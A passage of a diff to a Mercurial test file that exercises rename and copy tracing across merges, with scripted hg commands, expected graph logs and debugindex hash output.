-move-> g | | - o | 4 a-2: e -move-> f + o | a-2: e -move-> f | | - o | 3 a-1: d -move-> e + o | a-1: d -move-> e |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + +Subcase: new copy information on both side with an actual merge happening +````````````````````````````````````````````````````````````````````````` + +- the "p-" branch renaming 't' to 'v' (through 'u') +- the "q-" branch renaming 'r' to 'v' (through 'w') + + $ case_desc="merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content)" + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("q-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQm-0 $case_desc - one way" + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("p-2")' --tool ':union' + merging v + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQPm-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAEm")+desc("mEAm"))' + o mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |\ + +---o mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t | - o 0 i-0 initial commit: a b h + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: existing copy information overwritten on one branch +```````````````````````````````````````````````````````````` Merge: - one with change to an unrelated file (b) - one overwriting a file (d) with a rename (from h to i to d) + $ case_desc="simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + $ hg up 'desc("i-2")' 2 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg mv h i @@ -347,45 +481,104 @@ created new head $ hg mv --force i d $ hg commit -m "f-2: rename i -> d" - $ hg debugindex d + $ hg debugindex d | ../no-linkrev rev linkrev nodeid p1 p2 - 0 2 169be882533b 000000000000 000000000000 (no-changeset !) - 0 2 b789fdd96dc2 000000000000 000000000000 (changeset !) - 1 8 b004912a8510 000000000000 000000000000 - 2 22 4a067cf8965d 000000000000 000000000000 (no-changeset !) - 2 22 fe6f8b4f507f 000000000000 000000000000 (changeset !) + 0 * d8252ab2e760 000000000000 000000000000 (no-changeset !) + 0 * ae258f702dfe 000000000000 000000000000 (changeset !) + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 (no-changeset !) $ hg up 'desc("b-1")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mBFm-0 simple merge - one way' + $ hg ci -m "mBFm-0 $case_desc - one way" $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mFBm-0 simple merge - the other way' + $ hg ci -m "mFBm-0 $case_desc - the other way" created new head + $ hg up null --quiet $ hg log -G --rev '::(desc("mBFm")+desc("mFBm"))' - @ 24 mFBm-0 simple merge - the other way + o mFBm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way |\ - +---o 23 mBFm-0 simple merge - one way + +---o mBFm-0 simple merge - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way | |/ - | o 22 f-2: rename i -> d + | o f-2: rename i -> d + | | + | o f-1: rename h -> i | | - | o 21 f-1: rename h -> i - | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c + o i-0 initial commit: a b h p q r + + +Subcase: existing copy information overwritten on one branch, with different content) +````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (t) with a rename (from r to x to t), v content is not the same as on the other branch + + $ case_desc="simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content" + + $ hg up 'desc("i-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg mv r x + $ hg commit -m "r-1: rename r -> x" + created new head + $ hg mv --force x t + $ hg commit -m "r-2: rename t -> x" + $ hg debugindex t | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d74efbf65309 000000000000 000000000000 (no-changeset !) + 1 * 02a930b9d7ad 000000000000 000000000000 (no-changeset !) + 0 * 5aed6a8dbff0 000000000000 000000000000 (changeset !) + 1 * a38b2fa17021 000000000000 000000000000 (changeset !) + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("r-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mBRm-0 $case_desc - one way" + $ hg up 'desc("r-2")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mRBm-0 $case_desc - the other way" + created new head + $ hg up null --quiet + $ hg log -G --rev '::(desc("mBRm")+desc("mRBm"))' + o mRBm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - the other way + |\ + +---o mBRm-0 simple merge - B side: unrelated change, R side: overwrite d with a copy (from r->x->t) different content - one way + | |/ + | o r-2: rename t -> x + | | + | o r-1: rename r -> x + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t | - o 0 i-0 initial commit: a b h + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r +Subcase: reset of the copy history on one side +`````````````````````````````````````````````` + Merge: - one with change to a file - one deleting and recreating the file @@ -393,8 +586,10 @@ Unlike in the 'BD/DB' cases, an actual merge happened here. So we should consider history and rename on both branch of the merge. + $ case_desc="actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content" + $ hg up 'desc("i-2")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ echo "some update" >> d $ hg commit -m "g-1: update d" created new head @@ -404,33 +599,35 @@ merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mDGm-0 simple merge - one way' + $ hg ci -m "mDGm-0 $case_desc - one way" $ hg up 'desc("g-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("d-2")' --tool :union merging d 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m 'mGDm-0 simple merge - the other way' + $ hg ci -m "mGDm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mDGm")+desc("mGDm"))' - @ 27 mGDm-0 simple merge - the other way + @ mGDm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - the other way |\ - +---o 26 mDGm-0 simple merge - one way + +---o mDGm-0 actual content merge, copies on one side - D side: delete and re-add (different content), G side: update content - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 8 d-2 re-add d + o | d-2 re-add d | | - o | 7 d-1 delete d + o | d-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s | - o 1 i-1: a -move-> c - | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r +Subcase: merging a change to a file with a "copy overwrite" to that file from another branch +```````````````````````````````````````````````````````````````````````````````````````````` Merge: - one with change to a file (d) @@ -445,38 +642,43 @@ | | The current code arbitrarily pick one side + $ case_desc="merge - G side: content change, F side: copy overwrite, no content change" + $ hg up 'desc("f-2")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' --tool :union - merging d - 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mFGm-0 simple merge - one way' + $ hg ci -m "mFGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' - 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) $ hg merge 'desc("f-2")' --tool :union - merging d - 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + merging d (no-changeset !) + 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) (branch merge, don't forget to commit) - $ hg ci -m 'mGFm-0 simple merge - the other way' + $ hg ci -m "mGFm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))' - @ 29 mGFm-0 simple merge - the other way + @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way |\ - +---o 28 mFGm-0 simple merge - one way + +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 22 f-2: rename i -> d + o | f-2: rename i -> d | | - o | 21 f-1: rename h -> i + o | f-1: rename h -> i |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -491,6 +693,8 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge updated/deleted - revive the file (updated content)" + $ hg up 'desc("c-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("g-1")' @@ -502,7 +706,7 @@ [1] $ hg resolve -t :other d (no more unresolved files) - $ hg ci -m "mCGm-0" + $ hg ci -m "mCGm-0 $case_desc - one way" created new head $ hg up 'desc("g-1")' @@ -516,23 +720,23 @@ [1] $ hg resolve -t :local d (no more unresolved files) - $ hg ci -m "mGCm-0" + $ hg ci -m "mGCm-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))' - @ 31 mGCm-0 + @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way |\ - +---o 30 mCGm-0 + +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way | |/ - | o 25 g-1: update d + | o g-1: update d | | - o | 6 c-1 delete d + o | c-1 delete d |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -548,13 +752,15 @@ In this case, the file keep on living after the merge. So we should not drop its copy tracing chain. + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + $ hg up 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved $ hg merge 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mCB-revert-m-0" + $ hg ci -m "mCB-revert-m-0 $case_desc - one way" created new head $ hg up 'desc("b-1")' @@ -563,23 +769,23 @@ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) $ hg revert --rev 'desc("b-1")' d - $ hg ci -m "mBC-revert-m-0" + $ hg ci -m "mBC-revert-m-0 $case_desc - the other way" created new head $ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))' - @ 33 mBC-revert-m-0 + @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way |\ - +---o 32 mCB-revert-m-0 + +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way | |/ - | o 6 c-1 delete d + | o c-1 delete d | | - o | 5 b-1: b update + o | b-1: b update |/ - o 2 i-2: c -move-> d + o i-2: c -move-> d, s -move-> t | - o 1 i-1: a -move-> c + o i-1: a -move-> c, p -move-> s | - o 0 i-0 initial commit: a b h + o i-0 initial commit: a b h p q r @@ -593,43 +799,724 @@ (the copy information from the branch that was not deleted should win). + $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)" + $ hg up 'desc("i-0")' - 3 files updated, 0 files merged, 0 files removed, 0 files unresolved + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg mv b d $ hg ci -m "h-1: b -(move)-> d" created new head $ hg up 'desc("c-1")' - 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + 2 files updated, 0 files merged, 3 files removed, 0 files unresolved $ hg merge 'desc("h-1")' 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mCH-delete-before-conflict-m-0" + $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way" $ hg up 'desc("h-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("c-1")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' + @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way + |\ + +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way + | |/ + | o h-1: b -(move)-> d + | | + o | c-1 delete d + | | + o | i-2: c -move-> d, s -move-> t + | | + o | i-1: a -move-> c, p -move-> s + |/ + o i-0 initial commit: a b h p q r + + +Variant of previous with extra changes introduced by the merge +-------------------------------------------------------------- + +Multiple cases above explicitely test cases where content are the same on both side during merge. In this section we will introduce variants for theses cases where new change are introduced to these file content during the merges. + + +Subcase: merge has same initial content on both side, but merge introduced a change +``````````````````````````````````````````````````````````````````````````````````` + +Same as `mAEm` and `mEAm` but with extra change to the file before commiting + +- the "e-" branch renaming b to f (through 'g') +- the "a-" branch renaming d to f (through e) + + $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)" + + $ hg up 'desc("a-2")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("e-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mAE-change-m" > f + $ hg ci -m "mAE-change-m-0 $case_desc - one way" + created new head + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("a-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "content change for mEA-change-m" > f + $ hg ci -m "mEA-change-m-0 $case_desc - the other way" + created new head + $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))' + @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way + |\ + +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way + | |/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: merge overwrite common copy information, but with extra change during the merge +```````````````````````````````````````````````````````````````````````````````````````` + +Merge: +- one with change to an unrelated file (b) +- one overwriting a file (d) with a rename (from h to i to d) +- the merge update f content + + $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)" + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 +#endif + $ hg up 'desc("b-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("f-2")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mBF-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) + + $ hg up 'desc("f-2")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo "extra-change to (formelly h) during the merge" > d + $ hg ci -m "mFB-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !) + cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !) +#if no-changeset + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * d8252ab2e760 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 7b79e2fe0c89 000000000000 000000000000 + 3 * 17ec97e60577 d8252ab2e760 000000000000 + 4 * 06dabf50734c b004912a8510 17ec97e60577 + 5 * 19c0e3924691 17ec97e60577 b004912a8510 + 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577 + 7 * d55cb4e9ef57 000000000000 000000000000 + 8 * 1c334238bd42 7b79e2fe0c89 000000000000 +#else + $ hg debugindex d | ../no-linkrev + rev linkrev nodeid p1 p2 + 0 * ae258f702dfe 000000000000 000000000000 + 1 * b004912a8510 000000000000 000000000000 + 2 * 5cce88bf349f ae258f702dfe 000000000000 + 3 * cc269dd788c8 b004912a8510 5cce88bf349f + 4 * 51c91a115080 5cce88bf349f b004912a8510 + 5 * cea2d99c0fde ae258f702dfe 000000000000 +#endif + $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))' + @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way + |\ + +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way + | |/ + | o f-2: rename i -> d + | | + | o f-1: rename h -> i + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: restoring and untouched deleted file, while touching it +```````````````````````````````````````````````````````````````` + +Merge: +- one removing a file (d) +- one leaving the file untouched +- the merge actively restore the file to the same content. + +In this case, the file keep on living after the merge. So we should not drop its +copy tracing chain. + + $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)" + + $ hg up 'desc("c-1")' + 2 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("b-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mCB-change-m-0 $case_desc - one way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + $ hg up 'desc("b-1")' 1 files updated, 0 files merged, 0 files removed, 0 files unresolved $ hg merge 'desc("c-1")' 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (branch merge, don't forget to commit) - $ hg ci -m "mHC-delete-before-conflict-m-0" + $ hg revert --rev 'desc("b-1")' d + $ echo "new content for d after the revert" > d + $ hg ci -m "mBC-change-m-0 $case_desc - the other way" + created new head + $ hg manifest --rev . --debug | grep " d" + e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !) + 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !) + + + $ hg up null --quiet + $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))' + o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way + |\ + +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way + | |/ + | o c-1 delete d + | | + o | b-1: b update + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Decision from previous merge are properly chained with later merge +------------------------------------------------------------------ + +Subcase: chaining conflicting rename resolution +``````````````````````````````````````````````` + +The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 'f' and the arbitration done within "mAEm" and "mEA" +about that file should stay unchanged. + +We also touch J during some of the merge to check for unrelated change to new file during merge. + + $ case_desc="chained merges (conflict -> simple) - same content everywhere" + +(extra unrelated changes) + + $ hg up 'desc("a-2")' + 6 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo j > unrelated-j + $ hg add unrelated-j + $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)' + created new head + + $ hg up 'desc("e-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ echo k > unrelated-k + $ hg add unrelated-k + $ hg ci -m 'k-1: unrelated changes (based on "e" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mAEm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("k-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mAE,Km: $case_desc" + +(merge variant 2) + + $ hg up 'desc("k-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + + $ hg merge 'desc("mAEm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ hg ci -m "mK,AEm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mEAm")' + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("j-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ echo jj > unrelated-j + $ hg ci -m "mEA,Jm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("j-1")' + 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !) + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !) + $ hg merge 'desc("mEAm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !) + 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !) + (branch merge, don't forget to commit) + $ echo jj > unrelated-j + $ hg ci -m "mJ,EAm: $case_desc" created new head - $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))' - @ 36 mHC-delete-before-conflict-m-0 + + + $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))' + @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere |\ - +---o 35 mCH-delete-before-conflict-m-0 + +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere | |/ - | o 34 h-1: b -(move)-> d + | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere + | | |\ + | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere + | | | |/ + | | | o k-1: unrelated changes (based on "e" changes) + | | | | + | o | | j-1: unrelated changes (based on the "a" series of changes) + | | | | + o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way + |/ / / + | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way + |/|/ + | o e-2 g -move-> f + | | + | o e-1 b -move-> g + | | + o | a-2: e -move-> f + | | + o | a-1: d -move-> e + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining conflicting rename resolution, with actual merging happening +`````````````````````````````````````````````````````````````````````````````` + +The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We +add more change on the respective branch and merge again. These second merge +does not involve the file 't' and the arbitration done within "mPQm" and "mQP" +about that file should stay unchanged. + + $ case_desc="chained merges (conflict -> simple) - different content" + +(extra unrelated changes) + + $ hg up 'desc("p-2")' + 3 files updated, 0 files merged, 3 files removed, 0 files unresolved + $ echo s > unrelated-s + $ hg add unrelated-s + $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)' + created new head + + $ hg up 'desc("q-2")' + 2 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ echo t > unrelated-t + $ hg add unrelated-t + $ hg ci -m 't-1: unrelated changes (based on "q" changes)' + created new head + +(merge variant 1) + + $ hg up 'desc("mPQm")' + 1 files updated, 0 files merged, 2 files removed, 0 files unresolved + $ hg merge 'desc("t-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mPQ,Tm: $case_desc" + +(merge variant 2) + + $ hg up 'desc("t-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + + $ hg merge 'desc("mPQm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mT,PQm: $case_desc" + created new head + +(merge variant 3) + + $ hg up 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + $ hg merge 'desc("s-1")' + 1 files updated, 0 files merged, 0 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mQP,Sm: $case_desc" + +(merge variant 4) + + $ hg up 'desc("s-1")' + 2 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ hg merge 'desc("mQPm")' + 1 files updated, 0 files merged, 1 files removed, 0 files unresolved + (branch merge, don't forget to commit) + $ hg ci -m "mS,QPm: $case_desc" + created new head + $ hg up null --quiet + + + $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))' + o mS,QPm: chained merges (conflict -> simple) - different content + |\ + +---o mQP,Sm: chained merges (conflict -> simple) - different content + | |/ + | | o mT,PQm: chained merges (conflict -> simple) - different content + | | |\ + | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content + | | | |/ + | | | o t-1: unrelated changes (based on "q" changes) + | | | | + | o | | s-1: unrelated changes (based on the "p" series of changes) + | | | | + o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way + |/ / / + | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way + |/|/ + | o q-2 w -move-> v + | | + | o q-1 r -move-> w + | | + o | p-2: u -move-> v | | - o | 6 c-1 delete d - | | - o | 2 i-2: c -move-> d + o | p-1: t -move-> u + |/ + o i-2: c -move-> d, s -move-> t + | + o i-1: a -move-> c, p -move-> s + | + o i-0 initial commit: a b h p q r + + +Subcase: chaining salvage information during a merge +```````````````````````````````````````````````````` + +We add more change on the branch were the file was deleted. merging again +should preserve the fact eh file was salvaged. + + $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)" + +(creating the change) + + $ hg up 'desc("c-1")' + 5 files updated, 0 files merged, 0 files removed, 0 files unresolved + $ echo l > unrelated-l + $ hg add unrelated-l + $ hg ci -m 'l-1: unrelated changes (based on "c" changes)' + created new head + +(Merge variant 1) + + $ hg up 